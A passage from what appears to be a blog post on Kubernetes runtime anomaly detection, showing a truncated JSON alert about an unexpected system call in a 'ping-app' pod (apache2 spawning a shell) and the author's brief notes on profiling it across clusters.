172.16.0.2","comm":"sh","ppid":2736,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/bin/dash"}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"k8s":{"node":"k0s-01","namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805758411292178,"type":"normal"},"level":"error","message":"Unexpected system call: lseek","msg":"Unexpected system call","time":"2025-04-16T12:15:58Z"}
OK: this is where I am at... Now implementing how to get this into an image, and read it out. And test, which parts of the following profile translate across clusters, and which dont
Level up your Server Side game — Join 10,500 engineers who receive insightful learning materials straight to their inbox
- ← Previous
- Customer - Ingest and verify BoB